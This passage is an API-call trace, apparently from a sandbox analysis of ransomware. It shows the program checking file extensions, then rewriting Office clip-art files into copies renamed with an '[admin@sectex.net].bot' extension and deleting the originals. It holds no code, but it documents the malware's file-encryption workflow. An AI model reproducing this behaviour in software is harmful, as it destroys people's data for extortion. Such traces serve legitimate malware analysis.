	[0159.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.128] lstrlenW (lpString=".jpg") returned 4
	[0159.128] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.128] lstrlenW (lpString=".doc") returned 4
	[0159.128] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString=".docx") returned 5
	[0159.128] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.128] lstrlenW (lpString=".pdf") returned 4
	[0159.128] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString=".xls") returned 4
	[0159.128] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.128] lstrlenW (lpString=".xlsx") returned 5
	[0159.128] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.128] lstrlenW (lpString=".ppt") returned 4
	[0159.128] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.128] lstrlenW (lpString=".zip") returned 4
	[0159.129] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.129] lstrlenW (lpString=".rar") returned 4
	[0159.129] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.129] lstrlenW (lpString=".bz2") returned 4
	[0159.129] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.129] lstrlenW (lpString=".7z") returned 3
	[0159.129] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.129] lstrlenW (lpString=".dbf") returned 4
	[0159.129] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.129] lstrlenW (lpString=".1cd") returned 4
	[0159.129] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF") returned 63
	[0159.129] lstrlenW (lpString=".jpg") returned 4
	[0159.129] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.129] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.129] lstrlenW (lpString="J0105530.WMF") returned 12
	[0159.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.130] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7384) returned 1
	[0159.130] CloseHandle (hObject=0x3d8) returned 1
	[0159.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf")) returned 0x20
	[0159.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.130] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.130] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0159.131] GetLastError () returned 0x0
	[0159.131] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1cd8, lpOverlapped=0x0) returned 1
	[0159.162] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1ce0, lpOverlapped=0x0) returned 1
	[0159.163] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.163] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.163] SetEndOfFile (hFile=0x3b8) returned 1
	[0159.163] CloseHandle (hObject=0x3b8) returned 1
	[0159.164] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.164] SetEndOfFile (hFile=0x3d8) returned 1
	[0159.165] CloseHandle (hObject=0x3d8) returned 1
	[0159.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.166] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf")) returned 1
	[0159.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.167] lstrlenW (lpString=".doc") returned 4
	[0159.167] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString=".docx") returned 5
	[0159.167] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.167] lstrlenW (lpString=".pdf") returned 4
	[0159.167] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString=".xls") returned 4
	[0159.167] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.167] lstrlenW (lpString=".xlsx") returned 5
	[0159.167] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.167] lstrlenW (lpString=".ppt") returned 4
	[0159.167] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.167] lstrlenW (lpString=".zip") returned 4
	[0159.167] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.167] lstrlenW (lpString=".rar") returned 4
	[0159.167] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString=".bz2") returned 4
	[0159.167] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString=".7z") returned 3
	[0159.167] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.167] lstrlenW (lpString=".dbf") returned 4
	[0159.167] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.167] lstrlenW (lpString=".1cd") returned 4
	[0159.167] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.168] lstrlenW (lpString=".jpg") returned 4
	[0159.168] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.168] lstrlenW (lpString=".doc") returned 4
	[0159.168] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString=".docx") returned 5
	[0159.168] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.168] lstrlenW (lpString=".pdf") returned 4
	[0159.168] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString=".xls") returned 4
	[0159.168] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.168] lstrlenW (lpString=".xlsx") returned 5
	[0159.168] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.168] lstrlenW (lpString=".ppt") returned 4
	[0159.168] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.168] lstrlenW (lpString=".zip") returned 4
	[0159.168] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.168] lstrlenW (lpString=".rar") returned 4
	[0159.168] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString=".bz2") returned 4
	[0159.168] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString=".7z") returned 3
	[0159.168] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.168] lstrlenW (lpString=".dbf") returned 4
	[0159.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.168] lstrlenW (lpString=".1cd") returned 4
	[0159.168] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned 63
	[0159.169] lstrlenW (lpString=".jpg") returned 4
	[0159.169] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.169] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.169] lstrlenW (lpString="J0105588.WMF") returned 12
	[0159.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.169] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=21548) returned 1
	[0159.169] CloseHandle (hObject=0x3d8) returned 1
	[0159.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf")) returned 0x20
	[0159.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.170] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.170] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0159.171] GetLastError () returned 0x0
	[0159.171] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x542c, lpOverlapped=0x0) returned 1
	[0159.429] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5430, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5430, lpOverlapped=0x0) returned 1
	[0159.430] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.431] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.431] SetEndOfFile (hFile=0x3b8) returned 1
	[0159.431] CloseHandle (hObject=0x3b8) returned 1
	[0159.431] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.431] SetEndOfFile (hFile=0x3d8) returned 1
	[0159.433] CloseHandle (hObject=0x3d8) returned 1
	[0159.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf")) returned 1
	[0159.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.467] lstrlenW (lpString=".doc") returned 4
	[0159.467] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.467] lstrlenW (lpString=".docx") returned 5
	[0159.467] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.467] lstrlenW (lpString=".pdf") returned 4
	[0159.467] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.467] lstrlenW (lpString=".xls") returned 4
	[0159.467] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.467] lstrlenW (lpString=".xlsx") returned 5
	[0159.467] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.468] lstrlenW (lpString=".ppt") returned 4
	[0159.468] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.468] lstrlenW (lpString=".zip") returned 4
	[0159.468] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.468] lstrlenW (lpString=".rar") returned 4
	[0159.468] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString=".bz2") returned 4
	[0159.468] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString=".7z") returned 3
	[0159.468] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.468] lstrlenW (lpString=".dbf") returned 4
	[0159.468] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.468] lstrlenW (lpString=".1cd") returned 4
	[0159.468] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.468] lstrlenW (lpString=".jpg") returned 4
	[0159.468] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.468] lstrlenW (lpString=".doc") returned 4
	[0159.468] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString=".docx") returned 5
	[0159.468] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.468] lstrlenW (lpString=".pdf") returned 4
	[0159.468] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.468] lstrlenW (lpString=".xls") returned 4
	[0159.468] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.468] lstrlenW (lpString=".xlsx") returned 5
	[0159.469] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.469] lstrlenW (lpString=".ppt") returned 4
	[0159.469] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.469] lstrlenW (lpString=".zip") returned 4
	[0159.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.469] lstrlenW (lpString=".rar") returned 4
	[0159.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.469] lstrlenW (lpString=".bz2") returned 4
	[0159.469] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.469] lstrlenW (lpString=".7z") returned 3
	[0159.469] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.469] lstrlenW (lpString=".dbf") returned 4
	[0159.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.469] lstrlenW (lpString=".1cd") returned 4
	[0159.469] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned 63
	[0159.469] lstrlenW (lpString=".jpg") returned 4
	[0159.469] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.469] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.469] lstrlenW (lpString="J0105974.WMF") returned 12
	[0159.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.470] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4612) returned 1
	[0159.470] CloseHandle (hObject=0x3d8) returned 1
	[0159.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf")) returned 0x20
	[0159.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.471] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.471] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0159.472] GetLastError () returned 0x0
	[0159.472] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1204, lpOverlapped=0x0) returned 1
	[0159.475] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1210, lpOverlapped=0x0) returned 1
	[0159.476] ReadFile (in: hFile=0x3d8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.476] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.476] SetEndOfFile (hFile=0x3b8) returned 1
	[0159.476] CloseHandle (hObject=0x3b8) returned 1
	[0159.476] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.476] SetEndOfFile (hFile=0x3d8) returned 1
	[0159.478] CloseHandle (hObject=0x3d8) returned 1
	[0159.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105974.wmf")) returned 1
	[0159.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.504] lstrlenW (lpString=".doc") returned 4
	[0159.504] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString=".docx") returned 5
	[0159.504] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.504] lstrlenW (lpString=".pdf") returned 4
	[0159.504] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString=".xls") returned 4
	[0159.504] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.504] lstrlenW (lpString=".xlsx") returned 5
	[0159.504] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.504] lstrlenW (lpString=".ppt") returned 4
	[0159.504] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.504] lstrlenW (lpString=".zip") returned 4
	[0159.504] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.504] lstrlenW (lpString=".rar") returned 4
	[0159.504] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString=".bz2") returned 4
	[0159.504] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString=".7z") returned 3
	[0159.504] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.504] lstrlenW (lpString=".dbf") returned 4
	[0159.504] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.504] lstrlenW (lpString=".1cd") returned 4
	[0159.504] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.504] lstrlenW (lpString=".jpg") returned 4
	[0159.504] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
